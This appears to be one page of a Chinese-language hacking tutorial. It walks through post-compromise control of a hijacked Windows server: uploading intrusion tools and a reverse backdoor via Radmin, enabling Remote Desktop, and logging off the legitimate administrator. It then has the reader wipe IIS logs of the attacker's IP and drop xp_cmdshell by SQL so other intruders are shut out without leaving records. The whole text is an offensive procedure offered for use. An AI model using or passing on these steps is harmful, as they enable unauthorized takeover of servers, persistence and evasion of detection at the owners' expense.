四.用RADMIN客服端连接

上传文件到c:\\WINNT(XP是windows):

port.bat(如果是在XP下，这个要把里面的WINNT改为Windows)

query.exe quser.exe

SC.exe

CleanIISLog.exe.exe

3389.exe

psu.exe

最好再上传一个反弹后门RADMIN进入TELNET。

运行c:\\winnt\\3389.exe，重启肉鸡。

五.重启后用远程桌面远程器连上去

这里就有时会出现个问题。

使用3389登陆，发现登陆用户已满，不用怕，我们把他踢出去。

telnet对方ip，发现需要 NTLM 身份验证。我们在自己的电脑里建立一个帐号mint密码为mint身份为管理员。

找到c:\\winnt\\system32\\cmd.exe 建立一个快捷方式到桌面。修改cmd的快捷方式属性为允许其他身份登陆。然后运行桌面上的cmd.exe的快捷方式。输入帐号mint密码mint，telnet对方ip，直接可以登陆对方电脑了。

使用命令：

c:\\query user (查看对方目前终端登陆状况。)

运行命令：

c:\\logoff 1(踢出去一个管理者)

再用c:\\query user检查一便~~(这就是为什么不马上用1.bat了)

六.连上后..在cmd下运行

c:\\winnt\\log . 自己的IP .(擦PP)

c:\\winnet\\1.bat (删除覆盖查看当前在线用户文件)

七.打SA空口令补丁

程序-->>Microsoft SQL Server-->>查询分析器(有放大镜的)

-->>Windowst身位验证登陆

复制一下代码:SELMIS

if exists (select * from 

dbo.sysobjects where id = object_id(N\’[dbo].[xp_cmdshell]\’) and 

OBJECTPROPERTY(id, N\’IsExtendedProc\’) = 1) 

exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’ 

GO

按F5(运行)，关了退出SQL Server再用SQL Server身位验证进一次，退出(这是为了不留下记录)。

上一页  [1] [2] [3] 下一页